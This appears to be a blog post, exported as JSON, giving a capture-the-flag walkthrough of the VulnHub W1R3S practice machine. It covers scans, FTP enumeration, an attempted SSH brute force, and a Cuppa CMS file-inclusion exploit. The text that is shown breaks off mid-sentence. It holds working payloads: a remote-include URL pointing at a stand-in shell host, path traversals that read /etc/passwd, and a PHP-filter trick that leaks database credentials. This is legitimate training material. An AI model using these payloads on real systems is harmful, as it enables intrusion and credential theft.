{"id":1330,"date":"2021-07-11T01:43:36","date_gmt":"2021-07-11T01:43:36","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1330"},"modified":"2021-07-11T01:43:36","modified_gmt":"2021-07-11T01:43:36","slug":"w1r3s-1-0-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/11\/w1r3s-1-0-1\/","title":{"rendered":"W1R3S: 1.0.1"},"content":{"rendered":"<h2>Machine Information<\/h2>\n<p><strong>Description:<\/strong><br \/>\nYou have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in \/root directory).<\/p>\n<p>Difficulty to get a low privileged shell: Beginner\/Intermediate<\/p>\n<p>Difficulty to get privilege escalation: Beginner\/Intermediate<\/p>\n<p>About: This is a vulnerable Ubuntu box giving you somewhat of a real world scenario and reminds me of the OSCP labs.<\/p>\n<p>If you need any hints, pointers or have questions feel free to email me: specterinthewires at gmail dot com<\/p>\n<p>Virtual Machine: VMware Workstation<\/p>\n<p><strong>VulnHub Page:<\/strong><br \/>\n<a href=\"https:\/\/www.vulnhub.com\/entry\/w1r3s-101,220\/\">https:\/\/www.vulnhub.com\/entry\/w1r3s-101,220\/<\/a><\/p>\n<p><strong>Download Page:<\/strong><br \/>\n<a href=\"https:\/\/download.vulnhub.com\/w1r3s\/w1r3s.v1.0.1.zip\">https:\/\/download.vulnhub.com\/w1r3s\/w1r3s.v1.0.1.zip<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>Let's start by identifying the machine.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# arp-scan -l\nInterface: eth0, type: EN10MB, MAC: 00:0c:29:97:a8:e4, IPv4: 192.168.6.132\nStarting arp-scan 1.9.7 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n192.168.6.2 00:50:56:f3:da:b0   VMware, Inc.\n192.168.6.1 00:50:56:c0:00:08   VMware, Inc.\n192.168.6.135   00:0c:29:6a:49:14   VMware, Inc.\n192.168.6.254   
00:50:56:e2:58:34   VMware, Inc.\n\n35 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts\/sec). 4 responded\n<\/code><\/pre>\n<p>Let's continue with an nmap scan.<\/p>\n<pre><code class=\"language-sh\">[*] Scan: 187\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-10 21:33 EDT\nNmap scan report for W1R3S.inc (192.168.6.135)\nHost is up (0.00044s latency).\nNot shown: 55528 filtered ports, 10003 closed ports\nPORT     STATE SERVICE VERSION\n21\/tcp   open  ftp     vsftpd 2.0.8 or later\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content\n| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs\n|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.6.132\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 3\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)\n|   256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)\n|_  256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)\n80\/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\n3306\/tcp open  mysql   MySQL (unauthorized)\nMAC Address: 00:0C:29:6A:49:14 (VMware)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.10 - 4.11\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: 
cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.44 ms W1R3S.inc (192.168.6.135)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 56.85 seconds\n<\/code><\/pre>\n<p>Anonymous FTP login was allowed. I downloaded the files there, but they were not much help.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# ftp 192.168.6.135 \nConnected to 192.168.6.135.\n220 Welcome to W1R3S.inc FTP service.\nName (192.168.6.135:kali): anonymous\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees\n226 Directory send OK.\nftp&gt; cd content\n250 Directory successfully changed.\nftp&gt; ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 ftp      ftp            29 Jan 23  2018 01.txt\n-rw-r--r--    1 ftp      ftp           165 Jan 23  2018 02.txt\n-rw-r--r--    1 ftp      ftp           582 Jan 23  2018 03.txt\n226 Directory send OK.\nftp&gt; get 01.txt\nlocal: 01.txt remote: 01.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for 01.txt (29 bytes).\n226 Transfer complete.\n29 bytes received in 0.00 secs (11.7903 kB\/s)\nftp&gt; get 02.txt\nlocal: 02.txt remote: 02.txt\n200 PORT command successful. 
Consider using PASV.\n150 Opening BINARY mode data connection for 02.txt (165 bytes).\n226 Transfer complete.\n165 bytes received in 0.00 secs (69.5437 kB\/s)\nftp&gt; get 03.txt\nlocal: 03.txt remote: 03.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for 03.txt (582 bytes).\n226 Transfer complete.\n582 bytes received in 0.00 secs (301.3570 kB\/s)\nftp&gt; cd ..\n250 Directory successfully changed.\nftp&gt; ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees\n226 Directory send OK.\nftp&gt; cd docs\n250 Directory successfully changed.\nftp&gt; ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 ftp      ftp           138 Jan 23  2018 worktodo.txt\n226 Directory send OK.\nftp&gt; get worktodo.txt\nlocal: worktodo.txt remote: worktodo.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for worktodo.txt (138 bytes).\n226 Transfer complete.\n138 bytes received in 0.00 secs (74.2101 kB\/s)\nftp&gt; cd ..\n250 Directory successfully changed.\nftp&gt; ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees\n226 Directory send OK.\nftp&gt; cd new-employees\n250 Directory successfully changed.\nftp&gt; ls\n200 PORT command successful. 
Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 ftp      ftp           155 Jan 28  2018 employee-names.txt\n226 Directory send OK.\nftp&gt; get employee-names.txt\nlocal: employee-names.txt remote: employee-names.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for employee-names.txt (155 bytes).\n226 Transfer complete.\n155 bytes received in 0.00 secs (809.4502 kB\/s)\nftp&gt; exit\n221 Goodbye.<\/code><\/pre>\n<p>I tried to extract some usernames from the files I downloaded, then tried an SSH brute force with them, but it did not succeed.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# ls\n01.txt  02.txt  03.txt  employee-names.txt  worktodo.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat 01.txt             \nNew FTP Server For W1R3S.inc\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat 02.txt \n#\n#\n#\n#\n#\n#\n#\n#\n01ec2d8fc11c493b25029fb1f47f39ce\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\nSXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==\n############################################\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat 03.txt \n___________.__              __      __  ______________________   _________    .__               \n\\__    ___\/|  |__   ____   \/  \\    \/  \\\/_   \\______   \\_____  \\ \/   _____\/    |__| ____   ____  \n  |    |   |  |  \\_\/ __ \\  \\   \\\/\\\/   \/ |   ||       _\/ _(__  &lt; \\_____  \\     |  |\/    \\_\/ ___\\ \n  |    |   |   Y  \\  ___\/   \\        \/  |   ||    |   \\\/       \\\/        \\    |  |   |  \\  \\___ \n  |____|   |___|  \/\\___  &gt;   \\__\/\\  \/   |___||____|_  \/______  \/_______  \/ \/\\ |__|___|  \/\\___  &gt;\n                \\\/     \\\/         \\\/                \\\/       
\\\/        \\\/  \\\/         \\\/     \\\/ \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# ls         \n01.txt  02.txt  03.txt  employee-names.txt  worktodo.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat employee-names.txt \nThe W1R3S.inc employee list\n\nNaomi.W - Manager\nHector.A - IT Dept\nJoseph.G - Web Design\nAlbert.O - Web Design\nGina.L - Inventory\nRico.D - Human Resources\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat worktodo.txt      \n    \u0131 pou,\u0287 \u0287\u0265\u0131u\u029e \u0287\u0265\u0131s \u0131s \u0287\u0265\u01dd \u028d\u0250\u028e \u0287o \u0279oo\u0287\u00a1\n\n....puno\u0279\u0250 \u0183u\u0131\u028e\u0250\u05dfd do\u0287s \u2018op o\u0287 \u029e\u0279o\u028d \u025fo \u0287o\u05df \u0250 \u01dd\u028c\u0250\u0265 \u01dd\u028d\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# touch users    \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# echo &quot;naomi\\nhector\\njoseph\\nalbert\\ngina\\nrico&quot; &gt;&gt; users\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat users       \nnaomi\nhector\njoseph\nalbert\ngina\nrico<\/code><\/pre>\n<p>On port 80, I ran directory discovery and found a running application.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500# gobuster dir --url http:\/\/192.168.6.135 --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt  --no-error | tee 1\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer 
(@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.6.135\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              html,rar,7z,php,bak,txt,zip,sql,conf,php5,sh,bash,cap,pcap\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/07\/10 18:38:47 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/192.168.6.135\/icons\/               (Status: 403) [Size: 294]\nhttp:\/\/192.168.6.135\/index.html           (Status: 200) [Size: 11321]\nhttp:\/\/192.168.6.135\/javascript\/          (Status: 403) [Size: 299]  \nhttp:\/\/192.168.6.135\/administrator\/       (Status: 200) [Size: 4322] \nhttp:\/\/192.168.6.135\/server-status\/       (Status: 403) [Size: 302]  \nProgress: 2758095 \/ 19107510 (14.43%)                               ^C\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500# gobuster dir --url http:\/\/192.168.6.135\/administrator --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt  --no-error | tee 2  \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500# gobuster dir --url http:\/\/192.168.6.135\/administrator --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt  --no-error | tee 
2\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.6.135\/administrator\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              zip,7z,conf,bash,bak,php,html,sql,txt,rar,php5,sh,cap,pcap\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/07\/10 18:45:38 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/192.168.6.135\/administrator\/media\/               (Status: 200) [Size: 2624]\nhttp:\/\/192.168.6.135\/administrator\/templates\/           (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/index.php            (Status: 200) [Size: 4322]\nhttp:\/\/192.168.6.135\/administrator\/alerts\/              (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/language\/            (Status: 200) [Size: 1160]\nhttp:\/\/192.168.6.135\/administrator\/js\/                  (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/components\/          (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/api\/                 (Status: 200) [Size: 62]  \nhttp:\/\/192.168.6.135\/administrator\/classes\/             (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/extensions\/          (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/robots.txt           (Status: 200) [Size: 26]  \nhttp:\/\/192.168.6.135\/administrator\/installation\/        
(Status: 200) [Size: 4322]\nhttp:\/\/192.168.6.135\/administrator\/Configuration.php    (Status: 200) [Size: 0]   \n                                                                                  C\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500#                                                                                                                                                     130 \u2a2f\n<\/code><\/pre>\n<p>There was an Exploit-DB entry written for the running application.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500# searchsploit cuppa cms                          \n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                              |  Path\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nCuppa CMS - &#039;\/alertConfigField.php&#039; Local\/Remote File Inclusion                                                             | php\/webapps\/25971.txt\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500# cd ..                  \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cp $(locate php\/webapps\/25971.txt) .                              
\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat 25971.txt                       \n# Exploit Title   : Cuppa CMS File Inclusion\n# Date            : 4 June 2013\n# Exploit Author  : CWH Underground\n# Site            : www.2600.in.th\n# Vendor Homepage : http:\/\/www.cuppacms.com\/\n# Software Link   : http:\/\/jaist.dl.sourceforge.net\/project\/cuppacms\/cuppa_cms.zip\n# Version         : Beta\n# Tested on       : Window and Linux\n\n  ,--^----------,--------,-----,-------^--,\n  | |||||||||   `--------&#039;     |          O .. CWH Underground Hacking Team ..\n  `+---------------------------^----------|\n    `\\_,-------, _________________________|\n      \/ XXXXXX \/`|     \/\n     \/ XXXXXX \/  `\\   \/\n    \/ XXXXXX \/\\______(\n   \/ XXXXXX \/          \n  \/ XXXXXX \/\n (________(            \n  `------&#039;\n\n####################################\nVULNERABILITY: PHP CODE INJECTION\n####################################\n\n\/alerts\/alertConfigField.php (LINE: 22)\n\n-----------------------------------------------------------------------------\nLINE 22: \n        &lt\n-----------------------------------------------------------------------------\n\n#####################################################\nDESCRIPTION\n#####################################################\n\nAn attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. 
This vulnerability can lead to full server compromise.\n\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=[FI]\n\n#####################################################\nEXPLOIT\n#####################################################\n\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=http:\/\/www.shell.com\/shell.txt?\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\n\nMoreover, We could access Configuration.php source code via PHPStream \n\nFor Example:\n-----------------------------------------------------------------------------\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=php:\/\/filter\/convert.base64-encode\/resource=..\/Configuration.php\n-----------------------------------------------------------------------------\n\nBase64 Encode Output:\n-----------------------------------------------------------------------------\nPD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+\n-----------------------------------------------------------------------------\n\nBase64 Decode 
Output:\n-----------------------------------------------------------------------------\n&lt;?php \n    class Configuration{\n        public $host = &quot;localhost&quot;;\n        public $db = &quot;cuppa&quot;;\n        public $user = &quot;root&quot;;\n        public $password = &quot;Db@dmin&quot;;\n        public $table_prefix = &quot;cu_&quot;;\n        public $administrator_template = &quot;default&quot;;\n        public $list_limit = 25;\n        public $token = &quot;OBqIPqlFWf3X&quot;;\n        public $allowed_extensions = &quot;*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx&quot;;\n        public $upload_default_path = &quot;media\/uploadsFiles&quot;;\n        public $maximum_file_size = &quot;5242880&quot;;\n        public $secure_login = 0;\n        public $secure_login_value = &quot;&quot;;\n        public $secure_login_redirect = &quot;&quot;;\n    } \n?&gt;\n-----------------------------------------------------------------------------\n\nAble to read sensitive information via File Inclusion (PHP Stream)\n\n################################################################################################################\n Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 \n################################################################################################################   <\/code><\/pre>\n<p>The catch is that the exploit did not work when I tried it as described in the advisory. It expects a GET request. However, the parameter can be manipulated with a POST request. 
The POST request I sent is shown below.<\/p>\n<pre><code class=\"language-http\">POST \/administrator\/alerts\/alertConfigField.php HTTP\/1.1\nHost: 192.168.6.135\nContent-Type: application\/x-www-form-urlencoded \nContent-Length: 121\n\nurlConfig=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<\/code><\/pre>\n<pre><code class=\"language-http\">HTTP\/1.1 200 OK\nDate: Sun, 11 Jul 2021 00:32:58 GMT\nServer: Apache\/2.4.18 (Ubuntu)\nSet-Cookie: country=us; path=\/\nSet-Cookie: language=en; path=\/\nSet-Cookie: PHPSESSID=tl8pvlp28e5niha6si2nvrlu57; path=\/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nVary: Accept-Encoding\nContent-Length: 4347\nContent-Type: text\/html; charset=UTF-8\n\n&lt;style&gt;\n\n    .new_content{\n\n        position: fixed;\n\n    }\n\n    .alert_config_field{\n\n        font-size:12px;\n\n        background:#FFF;\n\n        position:relative;\n\n        border-radius: 3px;\n\n        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);\n\n        overflow:hidden;\n\n        position:fixed;\n\n        top:50%;\n\n        left:50%;\n\n        width:600px;\n\n        height:440px;\n\n        margin-left:-300px;\n\n        margin-top:-220px;\n\n    }\n\n    .alert_config_top{\n\n        position: relative;\n\n        margin: 2px;\n\n        margin-bottom: 0px;\n\n        border: 1px solid #D2D2D2;\n\n        background: #4489F8;\n\n        overflow: auto;\n\n        color:#FFF;\n\n        font-size: 13px;\n\n        padding: 7px 5px;\n\n        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);\n\n        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);\n\n    }\n\n    .description_alert{\n\n        position:relative;\n\n        font-size:12px;\n\n        text-shadow:0 1px #FFFFFF;\n\n        font-weight: normal;\n\n        padding: 5px 0px 5px 0px;\n\n    }\n\n    .btnClose_alert{\n\n        
position:absolute;\n\n        top: 4px; right: 2px;\n\n        width:22px;\n\n        height:22px;\n\n        cursor:pointer;\n\n        background:url(js\/cuppa\/cuppa_images\/close_white.png) no-repeat;\n\n        background-position: center;\n\n        background-size: 13px;\n\n    }\n\n    .content_alert_config{\n\n        position:relative;\n\n        clear:both;\n\n        margin: 2px;\n\n        margin-top: 0px;\n\n        height: 401px;\n\n        padding: 10px;\n\n        overflow: auto;\n\n    }\n\n&lt;\/style&gt;\n\n&lt;script&gt;\n\n    function CloseDefaultAlert(){\n\n        cuppa.setContent({&#039;load&#039;:false, duration:0.2});\n\n        cuppa.blockade({&#039;load&#039;:false, duration:0.2, delay:0.1});\n\n    }\n\n&lt;\/script&gt;\n\n&lt;div class=&quot;alert_config_field&quot; id=&quot;alert&quot;&gt;\n\n    &lt;div class=&quot;alert_config_top&quot;&gt;\n\n        &lt;strong&gt;Configuration&lt;\/strong&gt;:         &lt;div class=&quot;btnClose_alert&quot; id=&quot;btnClose_alert&quot; onclick=&quot;CloseDefaultAlert()&quot;&gt;&lt;\/div&gt;\n\n    &lt;\/div&gt;\n\n    &lt;div id=&quot;content_alert_config&quot; class=&quot;content_alert_config&quot;&gt;\n\n        root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List 
Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:\/run\/systemd:\/bin\/false\nsystemd-network:x:101:103:systemd Network Management,,,:\/run\/systemd\/netif:\/bin\/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:\/run\/systemd\/resolve:\/bin\/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:\/run\/systemd:\/bin\/false\nsyslog:x:104:108::\/home\/syslog:\/bin\/false\n_apt:x:105:65534::\/nonexistent:\/bin\/false\nmessagebus:x:106:110::\/var\/run\/dbus:\/bin\/false\nuuidd:x:107:111::\/run\/uuidd:\/bin\/false\nlightdm:x:108:114:Light Display Manager:\/var\/lib\/lightdm:\/bin\/false\nwhoopsie:x:109:117::\/nonexistent:\/bin\/false\navahi-autoipd:x:110:119:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/bin\/false\navahi:x:111:120:Avahi mDNS daemon,,,:\/var\/run\/avahi-daemon:\/bin\/false\ndnsmasq:x:112:65534:dnsmasq,,,:\/var\/lib\/misc:\/bin\/false\ncolord:x:113:123:colord colour management daemon,,,:\/var\/lib\/colord:\/bin\/false\nspeech-dispatcher:x:114:29:Speech Dispatcher,,,:\/var\/run\/speech-dispatcher:\/bin\/false\nhplip:x:115:7:HPLIP system user,,,:\/var\/run\/hplip:\/bin\/false\nkernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:\/:\/bin\/false\npulse:x:117:124:PulseAudio daemon,,,:\/var\/run\/pulse:\/bin\/false\nrtkit:x:118:126:RealtimeKit,,,:\/proc:\/bin\/false\nsaned:x:119:127::\/var\/lib\/saned:\/bin\/false\nusbmux:x:120:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/bin\/false\nw1r3s:x:1000:1000:w1r3s,,,:\/home\/w1r3s:\/bin\/bash\nsshd:x:121:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin\nftp:x:122:129:ftp daemon,,,:\/srv\/ftp:\/bin\/false\nmysql:x:123:130:MySQL Server,,,:\/nonexistent:\/bin\/false\n    &lt;\/div&gt;\n\n&lt;\/div&gt;<\/code><\/pre>\n<p>From the response we can successfully 
